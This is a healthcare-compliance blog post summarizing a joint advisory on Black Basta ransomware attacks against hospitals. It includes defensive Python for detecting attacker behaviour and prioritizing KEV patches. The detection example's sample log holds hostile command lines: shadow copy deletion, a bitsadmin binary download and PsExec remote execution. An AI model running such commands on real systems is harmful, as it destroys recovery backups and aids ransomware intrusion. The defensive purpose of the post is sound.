Advisory on Black Basta Ransomware Attacks on Healthcare Organizations

by Ryan Coyne | May 18, 2024

All healthcare and public health (HPH) sector organizations have received an alert to apply mitigations against Black Basta ransomware attacks, because the ransomware-as-a-service (RaaS) group is actively attacking the HPH sector.

In 2023, Black Basta was the third most prolific ransomware gang, after LockBit and ALPHV/Blackcat. Black Basta has since moved into second place and is increasing its attacks, particularly on critical infrastructure organizations. Black Basta affiliates have carried out data theft and encryption attacks on 12 of the 16 critical infrastructure sectors. Recently, the group has expanded its attacks on medical institutions. According to CNN sources, Black Basta attacked Ascension, disrupting medical operations at 140 of its hospitals.

Black Basta first appeared as a RaaS group in April 2022 and is believed to include members of the Conti ransomware group. The RaaS group is also associated with the FIN7 threat actor. The group uses double extortion: it exfiltrates sensitive information before encrypting files, then demands a ransom both to prevent publication of the data on its data leak site and to provide the keys for decrypting the files. The group specializes in high-impact attacks that cause substantial disruption to operations. On its Tor data leak site, the group claims extortion earnings of more than $100 million from over 500 ransomware attacks around the world.

According to the Health Information Sharing and Analysis Center (Health-ISAC), the Black Basta group attacked one healthcare provider in Europe and one in the United States last month, and both attacks caused massive disruption to operations. Health-ISAC, the Federal Bureau of Investigation (FBI), the Department of Health and Human Services (HHS), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) issued a joint cybersecurity advisory on the group. The advisory, issued as part of CISA’s Stop Ransomware initiative, describes the most recent tactics, techniques, and procedures (TTPs) employed by the group and up-to-date indicators of compromise (IoCs) identified by the FBI from its attack investigations and from third-party reports.

Black Basta uses several methods to gain initial access to victims’ systems, including spear phishing emails sent to employees of targeted companies. The group has also been observed using credentials bought from initial access brokers, QakBot malware for initial access, and vulnerability exploitation. Vulnerabilities exploited by the group include NoPac (CVE-2021-42278 and CVE-2021-42287), ZeroLogon (CVE-2020-1472), and ConnectWise (CVE-2024-1708 and CVE-2024-1709).

The group uses the following tools for remote access, reconnaissance, privilege escalation, lateral movement, file execution, and data exfiltration: BITSAdmin, Mimikatz, Cobalt Strike, PsExec, PowerShell, SoftPerfect, Splashtop, ScreenConnect, RClone, and WinSCP. The group identifies sensitive information to exfiltrate, deletes shadow copies to hinder recovery, and disables antivirus and endpoint detection software. After encrypting files, the group demands a ransom, the amount of which is negotiated with the victim.
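The tool list above translates directly into endpoint telemetry a defender can alert on. The following is an added example, not part of the advisory or of any vendor's product, that scans a small constructed set of Windows process-creation events (Sysmon Event ID 1 style, flattened to one pipe-separated line each) for three of the behaviours the paragraph describes: shadow copy deletion, BITSAdmin file transfers, and PsExec execution. The hostnames, users and command lines are made up for the example; the command-line patterns are the ones commonly used in detection rules for these behaviours.

```python
import re
from dataclasses import dataclass

# Constructed sample of Windows process-creation events (Sysmon Event ID 1 style),
# flattened to "host|user|parent_image|image|command_line". Hosts, users and
# commands are made up for this example and are not from any real incident.
SAMPLE_EVENTS = r"""
HOSTA|CORP\jdoe|C:\Windows\explorer.exe|C:\Program Files\Office\WINWORD.EXE|"WINWORD.EXE" C:\Users\jdoe\invoice.docx
HOSTA|CORP\jdoe|C:\Windows\System32\cmd.exe|C:\Windows\System32\vssadmin.exe|vssadmin delete shadows /all /quiet
HOSTB|NT AUTHORITY\SYSTEM|C:\Windows\System32\services.exe|C:\Windows\System32\svchost.exe|svchost.exe -k netsvcs
HOSTB|CORP\svc_backup|C:\Windows\System32\cmd.exe|C:\Windows\System32\wbem\WMIC.exe|wmic shadowcopy delete
HOSTC|CORP\admin|C:\Windows\System32\cmd.exe|C:\Windows\System32\bitsadmin.exe|bitsadmin /transfer job /download /priority high http://10.0.0.5/upd.bin C:\Users\Public\upd.bin
HOSTC|CORP\admin|C:\Windows\System32\cmd.exe|C:\Tools\PsExec.exe|PsExec.exe \\HOSTD -s cmd.exe
HOSTD|CORP\dba|C:\Windows\System32\cmd.exe|C:\Windows\System32\vssadmin.exe|vssadmin list shadows
"""


@dataclass(frozen=True)
class Rule:
    name: str
    severity: str
    pattern: re.Pattern  # matched against "<image> <command_line>"


# Behaviours the advisory summary describes: shadow copy removal before encryption,
# BITSAdmin for file transfer, PsExec for remote execution. The patterns are
# deliberately narrow; tune them against your environment's known-good admin activity.
RULES = (
    Rule("shadow_copy_deletion", "high",
         re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete", re.I)),
    Rule("bitsadmin_download", "medium",
         re.compile(r"bitsadmin(\.exe)?\s+/transfer\b.*?/download\b", re.I)),
    Rule("psexec_remote_exec", "medium",
         re.compile(r"\bpsexec(64)?\.exe\b", re.I)),
)


def parse_event(line):
    """Split one flattened event line into its five fields."""
    host, user, parent_image, image, command_line = line.split("|", 4)
    return {"host": host, "user": user, "parent_image": parent_image,
            "image": image, "command_line": command_line}


def scan_events(text):
    """Return one alert dict per (event, rule) match, in input order."""
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        event = parse_event(line)
        haystack = f"{event['image']} {event['command_line']}"
        for rule in RULES:
            if rule.pattern.search(haystack):
                alerts.append({"rule": rule.name, "severity": rule.severity,
                               "host": event["host"], "user": event["user"],
                               "command_line": event["command_line"]})
    return alerts


def summarize(alerts):
    """Count alerts per severity, e.g. {'high': 2, 'medium': 2}."""
    counts = {}
    for alert in alerts:
        counts[alert["severity"]] = counts.get(alert["severity"], 0) + 1
    return counts


if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS):
        print(f"[{alert['severity']}] {alert['rule']} on {alert['host']} "
              f"by {alert['user']}: {alert['command_line']}")
    print(summarize(scan_events(SAMPLE_EVENTS)))
```

Note that the benign `vssadmin list shadows` line on HOSTD produces no alert: the rule keys on the delete verb, not on the binary name, which keeps backup administrators' normal activity out of the queue. In a real deployment the shadow-copy rule should page on-call, since in the attack chain described above it immediately precedes encryption.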

The advisory urges healthcare providers and other critical infrastructure entities to comply with HIPAA and cybersecurity best practices and to implement mitigations against the most prevalent attack vectors. To safeguard against phishing and spear phishing, covered entities must implement advanced email security solutions that scan and validate URLs in email messages and include anti-malware features. Employees must receive HIPAA training that increases awareness of phishing threats and teaches them how to identify, prevent, and report phishing attacks.

Phishing-resistant multi-factor authentication must be enforced so that accounts remain protected even when credentials are exposed. Advanced anti-malware software must be installed on endpoints and configured to update signatures automatically. Remote access software must be secured, including with MFA. All software, firmware, and operating systems must run the most recent versions, with patches applied promptly. Even with all recommended mitigations in place, security breaches may still occur. It is therefore necessary to regularly back up sensitive information, critical systems, and device configurations to ensure rapid recovery and restoration after a successful cyberattack. Healthcare providers must also subscribe to threat intelligence sources such as CISA’s Known Exploited Vulnerabilities (KEV) catalog, and remediation of vulnerabilities that threat actors are actively exploiting must be prioritized.
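Prioritizing by the KEV catalog is a mechanical step once vulnerability scan results are in hand. The following is an added example, not code from the advisory, CISA or any product, that ranks a constructed asset inventory against a constructed excerpt written in the shape of the real KEV JSON feed (the field names `cveID`, `dueDate` and `knownRansomwareCampaignUse` are the feed's own; the CVE ids are the ones this article names, but every date, product name and ransomware flag in the excerpt is made up for the example, as are the hostnames and the deliberately invalid placeholder `CVE-EXAMPLE-0001`).

```python
import json
from datetime import date

# Real feed location, for reference only; this example runs entirely offline.
KEV_FEED_URL = "https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json"

# Date of this advisory summary, used as "today" so the ranking is reproducible.
AS_OF = date(2024, 5, 18)

# Constructed excerpt using the field names of the real KEV feed. The CVE ids are the
# ones the advisory names; every date, product name and ransomware flag below is made
# up for this example and must not be read as the catalog's real content.
SAMPLE_KEV_JSON = """
{
  "title": "Constructed excerpt in the shape of the CISA KEV feed",
  "vulnerabilities": [
    {"cveID": "CVE-2020-1472", "vendorProject": "Microsoft", "product": "Netlogon",
     "vulnerabilityName": "ZeroLogon", "dateAdded": "2024-01-01",
     "dueDate": "2024-01-15", "knownRansomwareCampaignUse": "Known"},
    {"cveID": "CVE-2021-42278", "vendorProject": "Microsoft", "product": "Active Directory",
     "vulnerabilityName": "NoPac", "dateAdded": "2024-02-01",
     "dueDate": "2024-02-15", "knownRansomwareCampaignUse": "Known"},
    {"cveID": "CVE-2021-42287", "vendorProject": "Microsoft", "product": "Active Directory",
     "vulnerabilityName": "NoPac", "dateAdded": "2024-02-01",
     "dueDate": "2024-02-15", "knownRansomwareCampaignUse": "Known"},
    {"cveID": "CVE-2024-1708", "vendorProject": "ConnectWise", "product": "ScreenConnect",
     "vulnerabilityName": "ScreenConnect", "dateAdded": "2024-05-01",
     "dueDate": "2024-06-30", "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2024-1709", "vendorProject": "ConnectWise", "product": "ScreenConnect",
     "vulnerabilityName": "ScreenConnect", "dateAdded": "2024-02-15",
     "dueDate": "2024-03-01", "knownRansomwareCampaignUse": "Known"}
  ]
}
"""

# Constructed asset inventory, as a vulnerability scanner might export it. Hostnames are
# placeholders; CVE-EXAMPLE-0001 is an intentionally invalid id standing in for a finding
# that is not in the catalog.
INVENTORY = [
    {"asset": "dc01.example.internal", "cves": ["CVE-2020-1472", "CVE-2021-42278", "CVE-2021-42287"]},
    {"asset": "rmm01.example.internal", "cves": ["CVE-2024-1708", "CVE-2024-1709"]},
    {"asset": "ws-042.example.internal", "cves": ["CVE-EXAMPLE-0001"]},
]


def load_kev(kev_json):
    """Index KEV entries by CVE id."""
    return {v["cveID"]: v for v in json.loads(kev_json)["vulnerabilities"]}


def classify(cve, kev, today):
    """Tier a CVE: 1 = in KEV with known ransomware use, 2 = in KEV, 3 = not in KEV."""
    entry = kev.get(cve)
    if entry is None:
        return {"priority": 3, "overdue": False, "due": None, "reason": "not in KEV"}
    due = date.fromisoformat(entry["dueDate"])
    ransomware = entry.get("knownRansomwareCampaignUse") == "Known"
    return {"priority": 1 if ransomware else 2,
            "overdue": today > due,
            "due": due,
            "reason": "KEV, known ransomware use" if ransomware else "KEV"}


def prioritize(inventory, kev_json, today=AS_OF):
    """One row per (asset, CVE): overdue KEV items first, then by tier, then by due date."""
    kev = load_kev(kev_json)
    rows = [{"asset": a["asset"], "cve": cve, **classify(cve, kev, today)}
            for a in inventory for cve in a["cves"]]
    rows.sort(key=lambda r: (not r["overdue"], r["priority"], r["due"] or date.max, r["cve"]))
    return rows


if __name__ == "__main__":
    for r in prioritize(INVENTORY, SAMPLE_KEV_JSON):
        flag = "OVERDUE" if r["overdue"] else ""
        print(f"P{r['priority']} {r['cve']:<16} {r['asset']:<24} due={r['due']} {r['reason']} {flag}")
```

The ordering puts anything past its KEV due date ahead of everything else, then uses the catalog's ransomware flag to break ties, so a domain controller exposed to ZeroLogon or NoPac lands at the top of the queue while a finding with no KEV entry waits behind every catalog item. Swapping `SAMPLE_KEV_JSON` for the downloaded feed and `INVENTORY` for a scanner export is the only change needed for real use.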


Ryan Coyne

Ryan Coyne is a results-driven leader in the healthcare compliance industry, specializing in regulatory compliance, compliance training, and assisting healthcare organizations and business associates in achieving and maintaining compliance. With a deep knowledge of healthcare regulations and a keen understanding of the challenges faced by the industry, Ryan has developed a reputation as a trusted advisor and advocate for ethical and compliant practices in healthcare. Ryan has successfully advised and guided numerous healthcare organizations, business associates, and healthcare professionals on achieving and maintaining compliance with regulatory training requirements. Ryan's professional focus is using his in-depth expertise and leading a world class team of subject matter experts at ComplianceJunction in regulatory compliance to help organisations navigate the complex landscape of ensuring staff adhere to healthcare regulations. You can connect with Ryan via LinkedIn and follow on Twitter
